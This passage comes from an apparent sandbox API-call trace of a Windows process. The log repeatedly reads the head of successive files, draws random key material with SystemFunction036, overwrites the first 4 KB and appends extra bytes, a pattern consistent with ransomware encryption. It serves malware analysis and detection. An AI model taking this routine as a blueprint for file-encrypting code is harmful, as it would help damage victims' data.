hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.623] GetProcessHeap () returned 0x4f10000 [0080.623] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.624] GetProcessHeap () returned 0x4f10000 [0080.624] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.625] GetProcessHeap () returned 0x4f10000 [0080.625] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.626] GetProcessHeap () returned 0x4f10000 [0080.626] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.626] SetFilePointerEx (in: hFile=0x864, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.627] WriteFile (in: hFile=0x864, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.627] WriteFile (in: hFile=0x864, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.627] GetProcessHeap () returned 0x4f10000 [0080.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.627] GetProcessHeap () returned 0x4f10000 [0080.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.627] GetProcessHeap () returned 0x4f10000 [0080.627] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.627] CloseHandle (hObject=0x864) returned 1 [0080.629] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 58 [0080.629] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.629] ReadFile (in: hFile=0x868, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.629] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.629] GetProcessHeap () returned 0x4f10000 [0080.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.629] GetProcessHeap () returned 0x4f10000 [0080.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.629] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.630] GetProcessHeap () returned 0x4f10000 [0080.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.630] ReadFile (in: hFile=0x868, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.677] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.677] WriteFile (in: hFile=0x868, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.677] GetProcessHeap () returned 0x4f10000 [0080.677] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.677] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.678] GetProcessHeap () returned 0x4f10000 [0080.678] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.679] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.679] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.680] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.680] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.681] GetProcessHeap () returned 0x4f10000 [0080.681] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.682] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.682] WriteFile (in: hFile=0x868, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.682] WriteFile (in: hFile=0x868, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.682] GetProcessHeap () returned 0x4f10000 [0080.682] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.682] CloseHandle (hObject=0x868) returned 1 [0080.684] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 59 [0080.684] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.684] ReadFile (in: hFile=0x86c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.684] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.684] GetProcessHeap () returned 0x4f10000 [0080.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.684] GetProcessHeap () returned 0x4f10000 [0080.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.684] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.684] GetProcessHeap () returned 0x4f10000 [0080.684] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.684] ReadFile (in: hFile=0x86c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.731] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.731] WriteFile (in: hFile=0x86c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.732] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.733] GetProcessHeap () returned 0x4f10000 [0080.733] HeapFree (in: hHeap=0x4f10000, 